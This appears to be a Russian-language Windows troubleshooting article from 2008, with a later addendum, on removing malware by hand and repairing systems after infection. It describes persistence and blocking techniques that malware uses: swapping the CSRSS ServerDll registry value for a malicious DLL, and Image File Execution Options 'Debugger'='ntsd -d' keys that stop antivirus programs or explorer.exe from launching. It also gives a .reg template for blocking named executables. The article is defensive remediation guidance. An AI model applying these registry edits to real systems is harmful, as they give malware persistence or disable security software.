Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше RootkitRevealer загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.

Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com . Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора "лучшего антивируса".
ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок компьютера, браузера, файлов...

Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Информация, предназначенная для диспетчера сеансов, находится в ключе реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager

Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems

то найдете значения

ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:

ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)

Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.

Поправить ситуацию можно так:

Загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
- загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.

Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:

"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
и перезагружаетесь.

В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"

Май 2008. ==

Дополнение

Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.

После удаления вируса ни один антивирус не работает.

Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:

Опасно - отладчик процесса "avz.exe"="ntsd-d"
Опасно - отладчик процесса "avguard.exe"="ntsd-d"
:.

Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

раздела с именем avz.exe , содержащем строковый параметр с именем "Debugger" и значением "ntsd -d" .
И, как выяснилось позже, в указанной ветке присутствовал не только раздел "avz.exe", но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe - вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела???.exe.

После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.

В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:

Windows Registry Editor Version 5.00
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. и т.д.

Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).

Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.

Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.

Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.

Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:

Autoruns - информация о параметрах запуска приложений и оболочке пользователя.
Service and Driver Manager - информация о службах и драйверах системы.

Простейшие способы нейтрализации вирусов в среде Windows 7 - В качестве продолжения темы - как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista \ Windows 7. Использование безопасного режима с поддержкой командной строки.

Использование загрузочного диска Winternals ERD Commander - Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) .

Сайт Олега Зайцева, автора AVZ. - Посвящен информационной безопасности, и в частности - применению одной из наиболее эффективных антивирусных утилит AVZ.

Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п.